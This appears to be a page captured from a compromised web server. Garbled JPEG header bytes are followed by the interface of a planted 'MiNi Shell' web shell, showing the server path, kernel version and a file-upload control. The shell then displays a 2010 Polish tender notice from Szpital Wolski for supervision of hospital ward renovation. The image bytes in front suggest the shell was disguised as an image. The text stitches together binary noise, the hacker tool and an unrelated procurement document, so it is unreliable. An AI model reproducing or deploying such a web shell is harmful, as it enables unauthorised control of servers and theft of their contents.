JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100427/99841-N-2010.html

<p class="kh_header"><b>Warszawa: Pełnienie obowiązków inwestora zastępczego</b><br>
<b>Numer ogłoszenia: 99841 - 2010; data zamieszczenia: 27.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wolski im. dr Anny Gostyńskiej Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Kasprzaka 17, 01-211 Warszawa, woj. mazowieckie, tel. 022 3894859, faks 022 3894922.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wolski.med.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie obowiązków inwestora zastępczego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Pełnienie obowiązków inwestora zastępczego  w zakresie  organizacji robót budowlanych wielobranżowych,  nadzoru  nad realizacją procesu inwestycyjnego ,rozliczenia i odbioru   podzadania inwestycyjnego. pn. Przebudowa i modernizacja wraz z dostosowaniem do przepisów techniczno - sanitarnych oddziałów szpitalnych w Pawilonie nr 8 -  Oddział Chirurgii Ogólne i Naczyniowej - I piętro, Oddział   Anestezjologii  i  Intensywnej Terapii - II piętro.
2.Ww podzadanie inwestycyjne  wchodzi w skład zadania inwestycyjnego pn.  Rozbudowa  i modernizacja Szpitala Wolskiego. 
Nadmieniamy, że realizacja robót  będzie przebiegała w czynnym obiekcie szpitalnym tj. 
Pawilonie Nr 8 Szpitala Wolskiego.
Użytkownicy Pawilonu Nr 8:
parter   -  Szpitalny Oddział Ratunkowy,  Diagnostyka  Laboratoryjna,  Administracja  
I piętro  -  Oddział Chirurgiczny prace budowlane - I i II etap
II piętro -  Oddział Anestezjologii i Intensywnej Terapii  prace budowlane - II   etap Blok Operacyjny. 
Szczegółowy technologicznie podział wielobranżowych  prac budowlanych nie kolidujących z pracą  innych Użytkowników pawilonu Nr 8 wchodzący w dany etap -
będzie należał do Inwestora Zastępczego.  Zakres prac powinien być ustalony z Wykonawcą  oraz  Zamawiającym.
Inwestycja  będzie realizowana na podstawienie nw dostępna na stronie internetowej www.wolski.med.pl w zakładce EP 25 2010
A)   dokumentacji projektowej 
1. P.B.W. Branża-  Architektura Biuro Architektoniczne i Sztuk Plastycznych  SOSAK i SOSAK) projektant mgr inż. arch. Stanisław Sosak 
2. P.B.W. Branża- Technologia  Biuro Architektoniczne i Sztuk Plastycznych  SOSAK i 
SOSAK)  projektant mgr inż. arch. Stanisław Sosak
3. P.B.W. Branża - Konstrukcja  (Konstrukcje Budowlane i Inżynierskie Sieczkowski-
Nikoniuk) projektant mgr inż .Artur Sieczkowski
4. P.B.W  Branża Elektryczna ( Pracownia Projektowa PROEL M. Hanowski, Zb Bardzicki)
 projektant   Zbigniew Bardzicki 
5. P.B.W  Branża Teletechniczna ( Pracownia Projektowa PROEL M. Hanowski  
Zb.Bardzicki) projektant Zbigniew Bardzicki 
6.  P.B.W. Branża - Instalacje sanitarne  (Biuro Architektoniczne i Sztuk Plastycznych 
SOSAK i SOSAK) projektant mgr inż. Eligiusz Kutyna
7.  P.B.W Branża- Gazy medyczne (  Biuro Architektoniczne i Sztuk Plastycznych 
SOSAK i SOSAK) projektant mgr inż. Andrzej Kochan  

B) Specyfikacji Technicznej Wykonania i Odbioru Robot Budowlanych
1) Branża : Architektura i Konstrukcja  ( Biuro Architektoniczne i Sztuk Plastycznych 
SOSAK i SOSAK) projektant mgr inż. arch. Stanisław Sosak 
2) Branża: Elektryczna ( Pracownia Projektowa PROEL M. Hanowski, Zb. Bardzicki)-
projektant Zbigniew Bardzicki
3) Branża: Instalacja okablowania strukturalnego, systemu sygnalizacji włamania, kontroli 
    dostępu (SSWiKD) projektant mgr inż. Rafał Czarnecki
4) Branża : Instalacje sanitarne ( Biuro Architektoniczne i Sztuk Plastycznych 
SOSAK i SOSAK) projektant mgr inż. Eligiusz Kutyna 
5) Branża: Gazy Medyczne(  Biuro Architektoniczne i Sztuk Plastycznych 
SOSAK i SOSAK) projektant mgr inż. Andrzej Kochan    

C)   Dokumentacji kosztorysowej  dla ww branż. 
Wspólny Słownik Zamówień (CPV): 71.52.00.00-9 - Usługi nadzoru budowlanego 

Do obowiązków  Inwestora zastępczego należy:
1.	Sprawdzenie przekazanej przez Zamawiającego dokumentacji projektowej, kosztorysowej przez pracowników inwestora zastępczego (inspektora nadzoru robót budowlano - konstrukcyjnych, inspektora nadzoru robót elektrycznych, inspektora nadzoru robót sanitarnych), zapoznanie się z dokumentami formalno-prawnymi niezbędnymi do rozliczania  dotacji na inwestycje z budżetu m. st. Warszawy w sferze ochrony zdrowia. Wyznaczenie koordynatora robót. 
2.	Przekazanie Wykonawcy dokumentacji projektowej oraz STWIOR. 
3.	Skompletowanie niezbędnych dokumentów zgodnie z obowiązującymi przepisami (Plan BIOZ, Oświadczenie kierownika budowy itp.) w celu dokonania zgłoszenie  rozpoczęcia robot budowlanych do PINB 
4.	Przygotowanie dokumentów oraz wprowadzenie przy udziale Zamawiającego Wykonawcy robót na plac budowy oraz  zaplecze budowy.
5.	Zapewnienie  stałej obecności w czasie prowadzenia prac na budowie przynajmniej jednego swojego przedstawiciela.
6.	Kontrola procesu rozpoczęcia budowy oraz na bieżąco kontrolowanie prawidłowości prowadzenia Dziennika Budowy, Ksiąg Obmiarów i przekazanie ich po odbiorze
końcowym.      
7.	Kontrola zgodności realizacji z dokumentacja projektową, warunkami   technicznymi wykonania robot, obowiązującymi przepisami , aktualną wiedzą techniczną, prawem budowlanym  oraz umową o realizacje zadania inwestycyjnego.
8.	Sprawdzanie jakości wykonywanych robot i wbudowanych materiałów, kontrola i  archiwizacja dokumentów potwierdzających dopuszczenie tych materiałów do obrotu i  stosowania w budownictwie.
9.	Sprawdzanie i dokonywanie odbiorów robot zanikających i (lub) ulęgających zakryciu.
10.	Współpraca z projektantami (w ramach nadzoru autorskiego).
11.	Zgłaszanie projektantom zastrzeżeń do dokumentacji od wykonawcy robot i  wyegzekwowanie od projektantów stosownych poprawek.
12.	Przekazywanie Zamawiającemu danych niezbędnych do opracowywania sprawozdań miesięcznych.
13.	Kontrolowanie zgodności realizacji prac z zapisami umowy, w szczególności z  harmonogramem rzeczowo- finansowym.
14.	Kwalifikowanie zasadności wykonania ewentualnych robót dodatkowych w uzgodnieniu z Zamawiającym (przy zachowaniu niezbędnej procedury).
15.	Sprawdzanie kosztorysów ofertowych, zamiennych  pod względem merytorycznym, formalno rachunkowym dla robót dodatkowych oraz nieprzewidzianych.
16.	Opracowywanie protokołów konieczności na roboty - nieprzewidziane i nieuwzględnione w dokumentacji projektowej i przekazanie ich do zatwierdzenia Zamawiającemu  po wcześniejszym uzyskaniu akceptacji  nadzoru autorskiego.
17.	Prowadzenie narad koordynacyjnych (protokolarnie) na budowie w terminach uzgodnionych z  Zamawiającym i Wykonawcą robót.
18.	Wydawanie kierownikowi budowy poleceń potwierdzonych wpisem do dziennika budowy, dotyczących nieprawidłowości lub zagrożeń,  a także tych wymagających odkrycia robót lub elementów.
19.	Żądanie od kierownika budowy dokonania poprawek bądź ponownego wykonania 
      wadliwie wykonanych robót.
20.	Uczestniczenie w próbach i odbiorach technicznych instalacji  oraz archiwizacja 
      protokółów prób i badań przeprowadzonych w  trakcie budowy.
21.	Potwierdzanie faktycznie wykonanych robót, bądź ich elementów podlegających 
      odbiorowi częściowemu, przygotowanie dokumentów do odbioru końcowego. 
22.	Doprowadzenie do odbioru końcowego zadania  inwestycyjnego, udział w komisjach 
      odbiorowych i przekazanie komisyjne inwestycji.
23.	Przygotowanie  kompletu dokumentów oraz zgłoszenie o zakończeniu budowy (do PINB) zgodnie z ustawą Prawo budowlane.
24.	Egzekwowanie usunięcia przez projektanta i wykonawcę robot - usterek oraz niedoróbek stwierdzonych komisyjne w trakcie odbioru końcowego.
25.	Kontrola rozliczeń finansowych, w tym:
a)	kontrola prawidłowości wystawiania faktur, zakresu prac i kwot; w zakresie 
zgodności z Umowy zawartej  z Wykonawca przez Zamawiającego. 
b)	sprawdzanie faktur częściowych i końcowych,  przedkładanych przez Wykonawcę, kwalifikowanie ich do zapłaty i przekazywanie ich zamawiającemu do zapłaty. 
c)	sprawdzanie i zatwierdzanie kosztorysów końcowych powykonawczych.
d)	przygotowanie materiałów związanych z naliczeniem kar umownych za
            nieterminowe  wykonanie robot.  
e)	rozliczenie końcowe inwestycji.
26.	Zamawiający ma prawo zgłaszać w każdym czasie uwagi i zastrzeżenia dotyczące procesu inwestycyjnego, które Inwestor zastępczy winien niezwłocznie przeanalizować i uwzględnić, zawiadamiając Zamawiającego o podjętych działaniach. 
27.	Planowanie i koordynowanie robót, dla zapewnienia ciągłości  technologicznej w trakcie realizacji inwestycji.
28.	Spowodowanie naniesienia zmian w projektach wykonawczych powstałych w trakcie
      wykonawstwa i przekazanie Zamawiającemu pełnego kompletu projektów w ramach dokumentacji powykonawczej.
29.	Przeprowadzanie przeglądów gwarancyjnych i pogwarancyjnych wynikających z umowy z Wykonawcą oraz sporządzanie stosownych protokołów;  dbałość o interesy Zamawiającego, a w szczególności zapewnienie przewidywanej w dokumentacji  jakości i funkcjonalności obiektu  zgodnie z obowiązującymi przepisami  dla zakładów opieki zdrowotnej.
Prosimy o zapoznanie się z przedmiotem SIWZ

Wynagrodzenie: 
1.	Wynagrodzenie Inwestora zastępczego za roboty podstawowe - cena ryczałtowa z określeniem procentu
2.	W przypadku wystąpienia robót dodatkowych procent -procent zgodnie z poz. 1.
3.	Możliwość wystawienia faktury częściowych miesięcznych nie więcej niż 80% wartości ceny ryczałtowej plus faktura końcowa.
4.	Czas trwania inwestycji - ok. 5 miesięcy bez uwzględnienia czasu na mogące wystąpić roboty dodatkowe..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W tym postępowaniu nie jest przewidziane wniesienie wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu wg formuły spełnia  nie spełnia na podstawie niżej wymienionych oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykonał w okresie ostatnich trzech lat przed upływem  terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie przynajmniej jedna usługa (w placówkach służby zdrowia), polegające na sprawowaniu funkcji Inwestora Zastępczego lub nadzoru inwestycyjnego nad realizacją robót budowlanych o zbliżonych charakterze, tj. roboty budowlane i instalacyjne polegające na przebudowie i remoncie budynków użyteczności publicznej o wartości brutto robót budowlanych nie mniejszej niż 4 000 000,00 PLN. 
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu wg formuły spełnia  nie spełnia na podstawie niżej wymienionych oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje, zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2006 r. Nr 156, poz. 1128 z późn. zm.):
- osobą, która będzie pełnić funkcję inspektora nadzoru robót budowlanych - konstrukcyjnych,
- osobą, która będzie pełnić funkcję inspektora nadzoru robót elektrycznych,
- osobą, która będzie pełnić funkcję inspektora nadzoru robót sanitarnych.
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu wg formuły spełnia  nie spełnia na podstawie niżej wymienionych oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu wg formuły spełnia  nie spełnia na podstawie niżej wymienionych oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu wg formuły spełnia  nie spełnia na podstawie niżej wymienionych oświadczeń i dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Pełnomocnictwo do podpisania oferty. Pełnomocnictwo należy załączyć do oferty tylko w przypadku, gdy oferta jest podpisania przez osobę nie figurującą w rejestrze lub wpisie do ewidencji działalności gospodarczej. Brak podpisu na ofercie lub podpisanie oferty przez osobę do tego nieupoważnioną spowoduje konieczność odrzucenia oferty. W przypadku składnia oferty przez podmioty występujące wspólnie, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego jeżeli oferta nie jest podpisana przez wszystkich Wykonawców występujących wspólnie. Postępowanie o udzielenie zamówienia publicznego nie jest postępowaniem sądowym, stwierdzić należy, że złożenie dokumentu pełnomocnictwa lub prokury albo jego odpisu, wypisu lub kopii przez pełnomocnika wykonawcy w postępowaniu o udzielenie zamówienia publicznego nie podlega opłacie skarbowej.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy, o spełnieniu warunków udziału w postępowaniu wskazanych w art. 22 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych o treści Załącznika Nr 2 do SIWZ.
Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności. Wykaz powinien być sporządzony zgodnie ze wzorem określonym w załączniku nr 5 do SIWZ.
Oświadczenia, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane prawem uprawnienia, a także oświadczenie, iż  na każde  żądanie  Zamawiającego (przedłożone w ciągu 3 dni)  przedstawi dokumenty potwierdzające to oświadczenie w tym: (uprawnienia zawodowe oraz przynależność do Izby).
Wykaz wykonanych, a przypadku świadczeń okresowych lub ciągłych również wykonywanych usług, o których mowa w Rozdziale  VI pkt. 1 ppkt. 2 SIWZ w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia (usługi inwestora zastępczego) z podaniem i wartości nadzorowanych robót, przedmiotu, dat wykonania i odbioru; Wykaz powinien być sporządzony zgodnie ze wzorem określonym w załączniku nr 6 do SIWZ. 

- Dokumenty, jakie ma dostarczyć Wykonawca w celu wykazania braku podstaw do wykluczenia z postępowania w okolicznościach, o których mowa w art. 24 ust. 1 Pzp:
1) Oświadczenie o braku podstaw do wykluczenia o treści Załącznika Nr 3 do SIWZ
2) Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
3) Wypełniony formularz oferty - załącznik nr 1 do SIWZ 
4) Istotne dla stron postanowienia, które zostaną wprowadzone do treści umowy  - Załącznik nr 4 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące zmiany w umowie w stosunku do treści oferty zgodnie z art. 144 ust. 1. ustawy:
a) możliwość dokonania zmiany terminu zakończenia w wyniku wystąpienia robót nieprzewidzianych lub dodatkowych prowadzonych na obiekcie,
b) możliwość  dokonania zmiany wynagrodzenia w przypadku:
- w przypadku konieczności zaniechania części zakresu przedmiotu umowy,
- w przypadku wystąpienia robót  zamiennych,
- w przypadku konieczności przerwania robót lub ograniczenia zakresu rzeczowego przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wolski.med.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wolski im. dr Anny Gostyńskiej, Samodzielny Publiczny Zakład Opieki Zdrowotnej, 01 - 211 Warszawa, ul. Kasprzaka 17 - pawilon nr 8 Sekcja Zamówień Publicznych.</p>
